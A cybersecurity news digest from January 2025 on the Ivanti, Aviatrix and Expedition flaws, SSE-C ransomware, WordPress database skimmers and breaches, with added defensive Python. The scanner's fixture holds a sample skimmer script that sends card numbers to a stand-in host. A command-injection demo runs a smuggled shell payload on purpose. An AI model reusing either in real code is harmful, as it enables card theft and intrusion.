CyberSecurity updates
2025-01-14 22:34:09 Pacific

Ivanti Zero-Day Actively Exploited For RCE - 5d

A critical zero-day, tracked as CVE-2025-0282, has been disclosed in Ivanti Connect Secure, Policy Secure, and Neurons for ZTA gateways. It is a stack-based buffer overflow that lets an unauthenticated remote attacker achieve remote code execution, and it is being actively exploited in the wild. Ivanti disclosed it alongside CVE-2025-0283, a second stack-based buffer overflow that only a local authenticated attacker can trigger and that yields privilege escalation rather than remote access. Organizations are advised to apply the available patches immediately (at the time of writing, Connect Secure 22.7R2.5; fixes for Policy Secure and Neurons for ZTA were scheduled to follow), run Ivanti's Integrity Checker Tool (ICT) on every appliance, and factory reset any device before returning it to production so that implanted malware is removed. A clean ICT result is not proof of a clean device: treat any appliance that was internet-facing while unpatched as potentially compromised, review its logs, and rotate credentials that passed through it. Ivanti appliances have a long history of being targeted.

Ransomware Abuses AWS Encryption Features - 23h

A new ransomware campaign, attributed to a crew dubbed 'Codefinger', abuses Amazon Web Services' Server-Side Encryption with Customer-Provided Keys (SSE-C) to encrypt objects in S3 buckets. Using stolen AWS credentials, the attackers rewrite the victim's objects with SSE-C and an AES-256 key that only they hold; AWS never stores an SSE-C key, only a salted HMAC of it, so neither the victim nor AWS can recover the data. The attackers then demand a ransom for the key and set S3 lifecycle rules that delete the objects within seven days to pressure victims into paying. Because this abuses a legitimate, fully logged AWS feature rather than a vulnerability, prevention hinges on credential hygiene and policy: rotate and scope down long-lived access keys, deny SSE-C in bucket policies unless it is genuinely needed, and alert on S3 data events whose SSEApplied field is SSE_C.
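The two controls named above, as an added example that is not part of the digest or of AWS's own tooling: a hunt over CloudTrail S3 data events for writes that applied SSE-C, and the bucket-policy statement that denies such writes. The CloudTrail records, account ID, bucket name and principals below are constructed for illustration; the CloudTrail field names and the IAM condition key are the real ones.

```python
"""Added example (not from the digest or from AWS): flag SSE-C writes in
CloudTrail S3 data events and emit a bucket-policy statement that blocks
them.  The CloudTrail records below are constructed for illustration; the
account ID, bucket and principals are made up."""
import json
from collections import Counter

# S3 write operations whose records carry SSEApplied in additionalEventData.
WRITE_EVENTS = {"PutObject", "CopyObject", "UploadPart", "CompleteMultipartUpload"}

# Constructed CloudTrail S3 data-event records (fields trimmed to what we use).
SAMPLE_RECORDS = [
    {"eventName": "PutObject", "eventTime": "2025-01-13T03:14:07Z",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/backup-svc"},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"bucketName": "acme-prod-data", "key": "db/2025-01-13.sql.gz"},
     "additionalEventData": {"SSEApplied": "SSE_C"}},
    {"eventName": "CopyObject", "eventTime": "2025-01-13T03:14:09Z",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/backup-svc"},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"bucketName": "acme-prod-data", "key": "db/2025-01-12.sql.gz"},
     "additionalEventData": {"SSEApplied": "SSE_C"}},
    {"eventName": "PutObject", "eventTime": "2025-01-13T04:00:00Z",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:role/app-uploader"},
     "sourceIPAddress": "10.0.3.21",
     "requestParameters": {"bucketName": "acme-prod-data", "key": "uploads/a.png"},
     "additionalEventData": {"SSEApplied": "SSE_KMS"}},
    {"eventName": "GetObject", "eventTime": "2025-01-13T04:00:05Z",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:role/app-uploader"},
     "sourceIPAddress": "10.0.3.21",
     "requestParameters": {"bucketName": "acme-prod-data", "key": "uploads/a.png"},
     "additionalEventData": {"SSEApplied": "SSE_KMS"}},
]


def find_ssec_writes(records):
    """Return one (principal, bucket, key, source_ip, time) tuple per write
    that applied SSE-C.

    CloudTrail records which encryption S3 applied (SSE_S3, SSE_KMS, SSE_C,
    ...) but never the key itself, so this is the only server-side trace a
    Codefinger-style rewrite leaves.  Any hit from a principal that has no
    business using customer-provided keys is worth an immediate look."""
    hits = []
    for rec in records:
        if rec.get("eventName") not in WRITE_EVENTS:
            continue
        if rec.get("additionalEventData", {}).get("SSEApplied") != "SSE_C":
            continue
        params = rec.get("requestParameters", {})
        hits.append((rec["userIdentity"]["arn"], params.get("bucketName"),
                     params.get("key"), rec.get("sourceIPAddress"), rec["eventTime"]))
    return hits


def suspicious_principals(hits, min_objects=2):
    """Principals that SSE-C-rewrote at least min_objects objects: a ransomware
    run touches many keys in a short window, one-off legitimate use does not."""
    counts = Counter(h[0] for h in hits)
    return {arn: n for arn, n in counts.items() if n >= min_objects}


def deny_ssec_policy(bucket):
    """Bucket policy denying any object write that presents an SSE-C key.

    AWS exposes the x-amz-server-side-encryption-customer-algorithm request
    header as the condition key
    s3:x-amz-server-side-encryption-customer-algorithm; "Null": "false"
    matches requests in which that header IS present.  CopyObject and
    multipart uploads are authorized as s3:PutObject, so one action suffices."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "DenySSECWrites",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:PutObject",
            "Resource": f"arn:aws:s3:::{bucket}/*",
            "Condition": {
                "Null": {"s3:x-amz-server-side-encryption-customer-algorithm": "false"}
            },
        }],
    }


if __name__ == "__main__":
    hits = find_ssec_writes(SAMPLE_RECORDS)
    for h in hits:
        print("SSE-C write:", *h)
    print("principals to investigate:", suspicious_principals(hits))
    print(json.dumps(deny_ssec_policy("acme-prod-data"), indent=2))
```

The hunt only works if S3 data events are enabled in CloudTrail for the buckets in question; management events alone do not record PutObject. The deny statement should be tested against any workload that legitimately uses SSE-C before it is applied to production buckets.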

WordPress Skimmers Inject Malicious Code in Database - 1d

A credit card skimmer campaign is targeting WordPress e-commerce checkout pages. Rather than modifying theme or plugin files, the malware stores its malicious JavaScript directly in the site's database (for example as widget or post content in tables such as wp_options and wp_posts), so file-integrity checks of the web root never see it. The script activates on checkout pages, captures the payment fields or injects a fake payment form, and exfiltrates the data, typically base64-encoded, to an attacker-controlled domain. Defenders should therefore monitor database content as well as files: search stored option and post values for <script> tags and obfuscation helpers such as atob and eval, audit widgets and custom HTML blocks, and review admin accounts and recent option changes as part of regular security audits.
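A database-side check of the kind described above, as an added example that is not part of the digest or of any vendor's scanner. It scans rows pulled from WordPress tables for script blocks, decodes any long base64 literal the script would hand to atob(), and scores each row against a few independent skimmer indicators. The rows, option names and the skimmer payload below are constructed samples; the indicator regexes are illustrative, not a complete signature set.

```python
"""Added example (not from the digest or any security vendor): scan stored
WordPress database values for injected checkout skimmers, including payloads
hidden behind base64 + atob().  The rows below are constructed samples; the
option names mirror real WordPress ones, the content is invented."""
import base64
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# A quoted base64 literal long enough to carry code rather than an icon or token.
B64_RE = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")

# Independent signals; a real skimmer usually shows several at once, a legitimate
# analytics or widget script rarely more than one.
INDICATORS = {
    "decode_obfuscation": re.compile(r"\b(atob|unescape|eval|String\.fromCharCode)\s*\(", re.I),
    "checkout_context": re.compile(r"checkout|place_order|billing_", re.I),
    "card_fields": re.compile(r"card[_-]?(number|num|cvv|cvc|exp)", re.I),
    "exfil": re.compile(r"fetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\(\)\.src", re.I),
}


def _decoded_blobs(text):
    """Yield the decoded form of every base64 literal that decodes to text."""
    for m in B64_RE.finditer(text):
        try:
            yield base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue


def scan_value(value):
    """Return the indicator names found in any <script> block inside value,
    scanning both the script body and anything it would atob() at runtime."""
    found = set()
    for m in SCRIPT_RE.finditer(value):
        body = m.group(1)
        for layer in (body, *_decoded_blobs(body)):
            for name, rx in INDICATORS.items():
                if rx.search(layer):
                    found.add(name)
    return found


def scan_rows(rows, threshold=2):
    """rows: (table, row_id, name, value) as pulled from wp_options / wp_posts.
    Report rows whose scripts trip at least `threshold` distinct indicators."""
    findings = []
    for table, row_id, name, value in rows:
        inds = scan_value(value)
        if len(inds) >= threshold:
            findings.append({"table": table, "id": row_id, "name": name,
                             "indicators": sorted(inds)})
    return findings


# --- constructed sample data -------------------------------------------------
# What the injected widget would execute once decoded (invented, inert domain).
_SKIMMER_JS = ('if(location.href.indexOf("checkout")>-1){'
               'var n=document.getElementById("card_number").value;'
               'fetch("https://cdn.example.invalid/g",{method:"POST",body:n});}')
_ENCODED = base64.b64encode(_SKIMMER_JS.encode()).decode()

SAMPLE_ROWS = [
    ("wp_options", 901, "widget_block",
     f'<div class="widget"><script>var p=atob("{_ENCODED}");eval(p);</script></div>'),
    ("wp_options", 17, "blogname", "Acme Gadgets"),
    ("wp_posts", 42, "checkout",
     "<p>Review your order and proceed to checkout.</p>"),
    ("wp_posts", 43, "analytics-snippet",
     '<script>fetch("/wp-json/acme/v1/ping",{method:"POST"});</script>'),
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f"{f['table']}#{f['id']} ({f['name']}): {', '.join(f['indicators'])}")
```

In practice the rows come from a query such as `SELECT option_id, option_name, option_value FROM wp_options` (and `post_content` from wp_posts); the threshold keeps a lone `fetch()` in a legitimate analytics snippet from paging anyone, while the widget that decodes, reads card fields and posts them off-site trips every indicator at once.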

FunkSec Ransomware Group Uses AI for Attacks - 3d

FunkSec, a ransomware group that emerged in late 2024, blurs the line between cybercrime and hacktivism. The group appears to use AI assistance to develop its malware and has quickly gained notoriety by leaking breached databases and selling access to government websites. Its ransom demands are unusually low and it is believed to operate as a four-member team, suggesting a mix of financial and visibility motives. FunkSec illustrates how AI tooling can lower the barrier to entry for inexperienced ransomware operators, and it is being tracked as an evolving threat. The defensive fundamentals still apply: network segmentation, tested offline backups, and security awareness training.

Fake Job Offers Distribute CrowdStrike Cryptominer - 3d

Cybercriminals are impersonating CrowdStrike recruiters in a fake job-offer campaign that delivers the XMRig cryptominer. Victims are directed to a CrowdStrike-branded lookalike site and told to download an "employee CRM application" as part of onboarding; the downloader performs basic sandbox and debugger checks before fetching and running the miner. This is a social engineering scam, not a compromise of CrowdStrike itself: job seekers should verify recruiter contact through the company's official channels and never install software as a precondition of an interview.

Aviatrix Controller RCE Vulnerability - 1d

A critical command injection vulnerability, CVE-2024-50603, in the Aviatrix Controller allows an unauthenticated remote attacker to execute arbitrary code. The flaw, rated CVSS 10.0, stems from API parameters being passed unsanitized into OS commands; it is fixed in Aviatrix Controller 7.1.4191 and 7.2.4996. Because the controller holds privileged cloud credentials, exploitation can lead to full system compromise, credential theft, and lateral movement into the surrounding cloud environment, and in-the-wild exploitation to deploy cryptominers and backdoors has already been reported. Hundreds of Aviatrix Controllers are exposed to the internet according to Shodan; they should be patched, removed from direct internet exposure, and reviewed for signs of compromise.

macOS SIP Bypass Vulnerability Disclosed - 22h

A macOS vulnerability, CVE-2024-44243, allows an attacker who already has root privileges to bypass System Integrity Protection (SIP), which normally restricts even root from modifying protected system locations. Microsoft's root cause analysis traces the bug to the Storage Kit daemon (storagekitd), which carries a private entitlement that lets it bypass SIP and could be coaxed into loading a third-party file-system kernel extension without the usual user approval. With SIP bypassed, an attacker can install rootkits, establish persistent malware, and sidestep Transparency, Consent, and Control (TCC) protections. Apple fixed the issue in macOS Sequoia 15.2; because a SIP bypass undermines every security layer built on top of it, organizations should update promptly and monitor for anomalous kernel extension loads and unexpected child processes of storagekitd.

Fortinet FortiGate Firewalls Targeted by Console Chaos - 10h

A campaign named 'Console Chaos' (after the FortiGate jsconsole web console the intruders were observed logging into) is targeting publicly exposed management interfaces on Fortinet FortiGate firewalls. Threat actors gain unauthorized administrative access, create new admin accounts, establish SSL VPN connections, and alter firewall configuration. The initial access vector was not confirmed at the time of the report, but mass exploitation of a zero-day was suspected; Fortinet has since attributed the activity to CVE-2024-55591, an authentication bypass in FortiOS and FortiProxy. Regardless of patch status, management interfaces should never be reachable from the internet: restrict admin access to trusted hosts or a management VPN, and audit for unknown admin accounts, unexpected SSL VPN users, and unexplained configuration changes.

Cyber Attack Hits Eindhoven University - 12h

Eindhoven University of Technology (TU/e) suffered a cyber attack and took its network offline as a precautionary measure to contain it, suspending classes as a result. The university is located near ASML, a key chip manufacturer, which has raised concerns about wider impact. Network systems were made inaccessible during the response, and there is no confirmation yet of data theft.

Massive Location Data Breach Affects Millions - 5d

A massive data breach at location data broker Gravy Analytics has exposed precise location data of millions of people. The data was harvested from thousands of popular apps, including Candy Crush, Tinder, and MyFitnessPal, largely through advertising bid streams, without the knowledge of users or, in many cases, of the app developers themselves. A sample of the data, containing coordinates of devices in the US, Europe, and Russia, was posted on a Russian-language forum by a hacker using the alias "Nightly". The incident underscores the risks of the collection and resale of location data through the ad-tech ecosystem.

Fake PoC exploit targets researchers with malware - 2d

A fake proof-of-concept (PoC) exploit is being used to target security researchers, posing as a PoC for the critical Microsoft LDAP vulnerability CVE-2024-49113 ("LDAPNightmare"). The attackers forked the legitimate PoC repository and replaced its Python files with an executable that, when run, drops a PowerShell script to fetch information-stealing malware. The aim is to steal credentials and other sensitive data from researchers who run untrusted exploit code on their own machines. Treat every PoC as untrusted: check the repository's provenance and history, diff forks against the original, and run them only in an isolated, disposable environment.

RedDelta Chinese APT Cyber Espionage Operations - 4d

The Chinese state-sponsored group RedDelta has been targeting Mongolia, Taiwan, and Southeast Asia since July 2023, distributing its customized PlugX backdoor through an evolving infection chain. RedDelta uses spearphishing with lure documents themed around political and cultural events, and has compromised government and diplomatic organizations in multiple countries. Its delivery chains have shifted over time among Windows Shortcut (LNK) files, Microsoft Management Console snap-in (MSC) files, and HTML files hosted on Microsoft Azure. The group also proxies command-and-control (C2) traffic through Cloudflare's CDN so that it blends in with legitimate traffic, complicating both detection and victim identification.

MirrorFace APT Cyber Espionage Campaign Against Japan - 4d

The China-linked MirrorFace APT has conducted extensive cyber espionage against Japan since 2019. The group delivers malware through spearphishing email attachments and exploits vulnerabilities in internet-facing VPN appliances to gain access and steal sensitive information. Targets include the Japanese government and organizations in defense, aerospace, semiconductors, communications, and research. Its toolset includes the ANEL and NOOPDOOR backdoors. The campaign reflects a sustained focus on Japan's national security and advanced technology sectors.

PowerSchool Breach Exposes Student Data - 5d

PowerSchool has disclosed a data breach affecting both hosted and self-hosted school districts. The intrusion, discovered on December 28, compromised student information such as grades, attendance, and enrollment data, potentially impacting a large number of K-12 districts. Affected customers were notified by email. PowerSchool has said the attacker used a compromised credential to access its PowerSource customer support portal; how that credential was obtained has not been disclosed.

Palo Alto Networks Expedition Flaws Expose Secrets - 5d

Multiple vulnerabilities have been disclosed in Palo Alto Networks' Expedition firewall migration tool, including an OS command injection flaw and a SQL injection flaw that exposes the Expedition database, whose contents include firewall usernames, cleartext passwords, device configurations, and API keys. Chained, they could let an attacker execute arbitrary code on the Expedition host and harvest credentials for every firewall it has touched. Palo Alto Networks fixed the issues in Expedition 1.2.100 and notes that Expedition reached end of life on December 31, 2024, so organizations that used it for migration or optimization should upgrade or decommission it, restrict network access to the host, and rotate any firewall credentials and API keys that were ever entered into it.
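Both the Aviatrix Controller entry above and this Expedition entry describe the same bug class: an API parameter reaching an OS command without validation. The following is an added, hypothetical example (not Aviatrix's or Palo Alto Networks' code) of that pattern beside its hardened form. The tool path, parameter names and allowlist are invented; the vulnerable variant is executed on purpose with a harmless `echo` payload so that the injection is visible in its output.

```python
"""Added example (hypothetical, not Aviatrix's or Palo Alto Networks' code):
the API-parameter-to-shell pattern behind OS command injection, shown beside a
hardened version.  The tool path, parameter names and allowlist are invented."""
import re
import subprocess

ALLOWED_CLOUD_TYPES = {"aws", "azure", "gcp"}          # hypothetical allowlist
INSTANCE_ID_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")
TOOL = "/opt/example/flightpath"                         # invented; need not exist


def build_command_vulnerable(cloud_type, instance_id):
    """The bug: request parameters are interpolated into a shell command line.
    Whatever string comes back is what /bin/sh will parse, metacharacters and all."""
    return f"{TOOL} --cloud {cloud_type} --instance {instance_id}"


def run_vulnerable(cloud_type, instance_id):
    """Executes the interpolated string through the shell, exactly the way
    os.system() or subprocess with shell=True would.  With
    cloud_type='aws; echo INJECTED' the shell runs the echo after the tool fails."""
    cmd = build_command_vulnerable(cloud_type, instance_id)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=10)


def build_command_hardened(cloud_type, instance_id):
    """Validate each parameter against a strict allowlist and build argv, so no
    shell ever parses attacker input.  Rejections raise rather than sanitize."""
    if cloud_type not in ALLOWED_CLOUD_TYPES:
        raise ValueError(f"unsupported cloud_type: {cloud_type!r}")
    if not INSTANCE_ID_RE.fullmatch(instance_id):
        raise ValueError("instance_id contains characters outside the allowed set")
    return [TOOL, "--cloud", cloud_type, "--instance", instance_id]


def run_hardened(cloud_type, instance_id):
    """shell=False passes argv straight to execve; ';', '|', '$(...)' etc. in a
    parameter are just bytes inside one argument, never command separators."""
    argv = build_command_hardened(cloud_type, instance_id)
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    payload = "aws; echo INJECTED"
    print("vulnerable ->", run_vulnerable(payload, "i-0abc").stdout.strip())
    try:
        run_hardened(payload, "i-0abc")
    except ValueError as e:
        print("hardened   ->", e)
```

The hardened version rejects rather than escapes: an allowlist of known values for enumerated parameters and a tight character class for identifiers are far easier to reason about than quoting rules, and passing an argv list with `shell=False` removes the shell from the path entirely. Auditing a codebase for `shell=True`, `os.system`, `popen` and their equivalents in other languages, then tracing each argument back to the request, is the quickest way to find this class of flaw.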

Medusind Data Breach Exposes 360k Patient Data - 3d

US dental and medical billing firm Medusind is notifying more than 360,000 individuals that their personal, financial, and medical data may have been accessed by a cybercriminal actor. The breach stems from an incident discovered on December 29, 2023, more than a year before notifications went out. The compromised information includes names, dates of birth, email addresses, phone numbers, Social Security numbers, driver's license numbers, taxpayer IDs, payment details, and health insurance information.

Apple Settles Siri Privacy Eavesdropping Lawsuit - 9d

Apple has agreed to pay $95 million to settle a class-action lawsuit alleging that Siri activated unintentionally and recorded users' conversations without their consent, and that some of those recordings were shared with third parties. The settlement covers millions of users who owned Siri-enabled devices during the class period; Apple denies wrongdoing. Users who want to limit exposure can disable Siri or its voice trigger and delete their Siri history in Settings. The case highlights the importance of transparency around voice data; Apple had already changed its Siri privacy practices, including making human review of audio recordings opt-in, after earlier reporting on contractor access to recordings.

White House Unveils Cyber Trust Mark Program - 6d

The White House has launched the U.S. Cyber Trust Mark, a voluntary labeling program for consumer IoT devices. The label tells consumers that a household product such as a smart camera, baby monitor, or fitness tracker meets baseline cybersecurity criteria vetted by the government, in the same way the Energy Star label signals energy efficiency. The program is administered by the FCC with criteria drawn from NIST's consumer IoT baseline, and labeled products are expected on shelves in 2025. The aim is to give manufacturers a market incentive to invest in security and to help consumers choose safer devices; each label also carries a QR code linking to details such as the product's support period and update policy.